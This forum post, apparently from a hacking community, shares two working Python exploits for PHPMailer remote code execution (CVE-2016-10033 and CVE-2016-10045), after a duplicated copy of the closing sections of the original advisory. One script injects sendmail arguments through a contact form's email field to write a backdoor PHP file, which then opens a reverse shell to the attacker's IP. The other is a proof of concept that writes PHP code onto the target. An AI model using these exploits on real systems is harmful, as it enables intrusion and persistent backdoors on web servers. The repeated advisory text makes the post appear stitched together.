VII. SYSTEMS AFFECTED
-------------------------
All current versions of (PHPMailer <5.2.20) are affected.
Note that exploitation is not limited to systems with Sendmail MTA.
VIII. SOLUTION
-------------------------
No official solution is available at the moment.
NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th and a new CVE was issued by MITRE on the same day.
However a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose which is what triggered
the earlier release of this advisory.
The vendor has been working on a new patch since the private disclosure
on 26th December which should be published shortly.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory (CVE-2016-10045):
https://legalhackers.com/advisories...de-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
The original vuln of CVE-2016-10033:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10045/PHPMailer_RCE_exploit.py
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045
PHPMailer / Vendor security updates / notices:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
http://php.net/manual/en/function.mail.php
PHPMailer 5.2.18 CVE 2016-10033 + Video
Code in Python
PHPMailer 5.2.18 & 5.2.20 CVE 2016-10033 - CVE 2016-10045
Code in Python
I hope it helps, A greeting to all the brothers of this community
-------------------------
All current versions of (PHPMailer <5.2.20) are affected.
Note that exploitation is not limited to systems with Sendmail MTA.
VIII. SOLUTION
-------------------------
No official solution is available at the moment.
NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th and a new CVE was issued by MITRE on the same day.
However a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose which is what triggered
the earlier release of this advisory.
The vendor has been working on a new patch since the private disclosure
on 26th December which should be published shortly.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory (CVE-2016-10045):
https://legalhackers.com/advisories...de-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
The original vuln of CVE-2016-10033:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10045/PHPMailer_RCE_exploit.py
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045
PHPMailer / Vendor security updates / notices:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
http://php.net/manual/en/function.mail.php
PHPMailer 5.2.18 CVE 2016-10033 + Video
Code in Python
Kod:
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
'name': payload,
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'curl/7.47.0',
'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
print('[+] ExPLoITeD ' + target)PHPMailer 5.2.18 & 5.2.20 CVE 2016-10033 - CVE 2016-10045
Code in Python
Kod:
#!/usr/bin/python
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()I hope it helps, A greeting to all the brothers of this community
